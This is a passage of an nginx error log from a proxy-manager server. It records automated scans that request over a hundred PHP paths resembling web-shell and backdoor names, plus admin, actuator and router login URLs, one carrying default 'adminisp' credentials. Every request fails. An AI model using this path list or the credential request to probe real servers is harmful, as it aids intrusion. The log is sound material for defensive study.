217#217: *4453 open() "/var/www/html/web-console/ServerInfo.jsp" failed (2: No such file or directory), client: 173.197.14.231, server: localhost-nginx-proxy-manager, request: "HEAD /web-console/ServerInfo.jsp HTTP/1.1", host: "92.249.249.197" +2026/01/12 12:21:19 [error] 217#217: *4460 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 59.103.104.254, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" +2026/01/12 12:27:45 [error] 217#217: *4462 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 91.232.238.112, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "92.249.249.197" +2026/01/12 13:32:39 [error] 218#218: *4482 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 14:02:30 [error] 220#220: *6027 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:30 [error] 220#220: *6027 open() "/var/www/html/zziih.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /zziih.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/meed.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //meed.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/norn.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /norn.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/undel.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /undel.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/dy.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /dy.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/hytr.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /hytr.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/xs.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/ax.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/zziih.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //zziih.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/meed.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /meed.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/norn.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //norn.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/undel.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //undel.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/dy.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //dy.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/hytr.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //hytr.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/xs.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //xs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/ax.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //ax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/wp-admin/images/wp-conflg.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/images/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/assets/css/index.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //assets/css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/function/function.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //function/function.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/mah/function.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //mah/function.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //wp-content/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/cgi-bin/index.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //cgi-bin/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 "/var/www/html/wp-includes/css/dist/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/dist/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/aa.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //aa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:31 [error] 220#220: *6027 open() "/var/www/html/av.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //av.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/adminfuns.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //adminfuns.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/templates/beez/index.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //templates/beez/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/edit.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //edit.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/inc.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //inc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //item.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 "/var/www/html/wp-includes/js/dist/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/js/dist/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/log.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //log.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //lock360.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //class.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/update/f35.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /update/f35.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/file/function.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //file/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/adminfuns.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //adminfuns.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/wp-content/wp-configs.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //wp-content/wp-configs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //goods.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/wp-l0gin.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-l0gin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/wp-includes/id3/admin.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/id3/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/sadd5.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //sadd5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/xenium4.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xenium4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/sadd5.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /sadd5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/file58.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /file58.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:32 [error] 220#220: *6027 open() "/var/www/html/f5.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /f5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/ma.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ma.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/s1.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /s1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/xa.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/f8.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /f8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/flower2.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /flower2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/000.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /000.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/ss1.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ss1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/shoyo.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /shoyo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/adminfuns.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /adminfuns.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/file48.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /file48.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/class9.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /class9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/bless11.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /bless11.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /class.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/bless5.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /bless5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /lock360.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/f35.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /f35.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/gg.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /gg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:33 [error] 220#220: *6027 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/class20.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /class20.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /admin.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/xtride.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xtride.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/s11.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /s11.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/goat.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /goat.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /goods.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/f6.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /f6.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /galex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /inputs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/pp.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /pp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-content/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:34 [error] 220#220: *6027 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-includes/fonts/index.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/fonts/index.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-admin/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-admin/css/colors/blue/index.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/blue/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-includes/wp-class.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/wp-class.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-admin/css/colors/midnight/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/midnight/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-content/radio.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-content/radio.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/ac.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ac.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-content/alfa.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //wp-content/alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/wp-admin/css/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/css/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/admin/resources/dummy/log.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /admin/resources/dummy/log.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/bras.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /bras.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/xe.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xe.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/bipas.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /bipas.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/xb.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xb.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/defaul1.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /defaul1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/css/license.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /css/license.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:35 [error] 220#220: *6027 open() "/var/www/html/xtt.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xtt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/wp-includes/widgets/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET 